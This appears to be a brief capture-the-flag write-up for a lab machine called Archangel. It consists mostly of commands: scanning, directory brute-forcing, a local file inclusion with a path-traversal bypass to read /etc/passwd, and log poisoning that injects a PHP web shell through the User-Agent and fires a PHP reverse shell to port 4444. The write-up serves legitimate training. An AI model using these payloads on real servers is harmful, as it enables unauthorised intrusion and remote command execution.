# Archangel

```
nmap -A -T4 -p- oN nmap.txt 10.10.173.179
dirb http://10.10.173.179 /usr/share/wordlists/dirb/common.txt
```

added "10.10.173.179 mafialive.thm" to /etc/hosts

```
gobuster dir -u http://mafialive.thm -w /usr/share/wordlists/dirb/common.txt
```

Found file test.php

http://mafialive.thm/test.php?view= can be exploited (LFI)

```
curl http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php
```

The source code says that the ?view parameter can't have "../.." in it, but it must have /var/www/html/development_testing/ in it

```
curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//etc/passwd
```

We can put a reverse shell in user agent so that when we curl access.log it will execute it

This is the decoded string:

```
php -r '$sock=fsockopen("10.6.1.136",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
```

```
curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//etc/passwd -H "User-Agent: <?php system($_GET[‘cmd’]); ?>"
curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log&cmd=php+-r+'$sock%3dfsockopen("10.6.1.136",4444)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b'


curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//etc/passwd -A "php+-r+%27%24sock%3Dfsockopen%28%2210.6.1.136%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27"
curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log
```
